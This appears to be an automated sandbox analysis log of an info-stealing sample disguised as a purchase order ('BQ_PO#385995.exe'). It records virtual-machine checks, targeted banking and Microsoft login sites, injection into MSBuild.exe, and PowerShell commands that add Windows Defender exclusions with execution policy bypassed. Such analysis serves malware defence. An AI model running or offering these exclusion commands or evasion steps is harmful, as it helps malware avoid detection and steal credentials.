Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 596250 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 596133 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 596031 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 595922 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 595813 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 595688 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 595563 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 595453 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 595326 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 595216 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 595110 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 594989 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 594844 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 594722 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 594594 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 594469 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 594360 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 594235 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 594110 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 593985 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 593860 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 593735 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 593610 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Thread delayed: delay time: 593485 Jump to behavior
Source: Amcache.hve.7.dr Binary or memory string: VMware
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: BQ_PO#385995.exe, 00000000.00000002.2258559792.000002760A756000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Amcache.hve.7.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: BQ_PO#385995.exe, 00000000.00000002.2258559792.000002760A756000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE
Source: BQ_PO#385995.exe, 00000000.00000002.2258559792.000002760A756000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Amcache.hve.7.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Amcache.hve.7.dr Binary or memory string: vmci.sys
Source: BQ_PO#385995.exe, 00000000.00000002.2258559792.000002760A756000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: BQ_PO#385995.exe, 00000000.00000002.2258559792.000002760A756000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: BQ_PO#385995.exe, 00000000.00000002.2258559792.000002760A756000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: BQ_PO#385995.exe, 00000000.00000002.2258559792.000002760A756000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: BQ_PO#385995.exe, 00000000.00000002.2258559792.000002760A756000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: Amcache.hve.7.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr Binary or memory string: VMware, Inc.
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Amcache.hve.7.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: ubygsn.exe, 0000000E.00000002.4593828211.0000000002FC8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd167d86b4a9a5<
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: BQ_PO#385995.exe, 00000000.00000002.2258559792.000002760A756000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: BQ_PO#385995.exe, 00000000.00000002.2258559792.000002760A756000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: ubygsn.exe, 0000000E.00000002.4593828211.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd1659e59db6a3<
Source: Amcache.hve.7.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: ubygsn.exe, 0000000E.00000002.4589922989.00000000010B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: MSBuild.exe, 00000003.00000002.4587722446.00000000015A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb,
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr Binary or memory string: \driver\vmci,\driver\pci
Source: BQ_PO#385995.exe, 00000000.00000002.2258559792.000002760A756000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: Amcache.hve.7.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Amcache.hve.7.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: ubygsn.exe, 0000000E.00000002.4608317412.000000000407E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_06989548 LdrInitializeThunk, 14_2_06989548
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: BQ_PO#385995.exe, -------------.cs Reference to suspicious API methods: GetProcAddress(_05B9_05B4_05B5_05AF_05B4_05B0_0596_05AE_05B2_05A6_05AE_05A1_05F5_05C9_0599_05AA_059E_05CF_059A_05F8_05F7, _05B6_05C6_05BD_05AB_05C0_05FD_05A3_0593_05CC_05C2_05CD_05C3)
Source: BQ_PO#385995.exe, -------------.cs Reference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)(ulong)_05B2_05AE_05B3_05EE_05C7_05B2_05A8_05AD_05FE_05B8_05C5_05C2_05B6.Length, 64u, out var _05A4_05B6_05A2_05FE)
Source: BQ_PO#385995.exe, -------------.cs Reference to suspicious API methods: LoadLibrary(array5[0])
Source: 0.2.BQ_PO#385995.exe.2760a49b688.2.raw.unpack, Messages.cs Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Adds a directory exclusion to Windows Defender
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe' Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write Jump to behavior
Bypasses PowerShell execution policy
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe'
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000 Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40A000 Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40C000 Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1147008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msbuild.exe' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Users\user\AppData\Local\Temp\ubygsn.exe "C:\Users\user\AppData\Local\Temp\ubygsn.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Queries volume information: C:\Users\user\Desktop\BQ_PO#385995.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
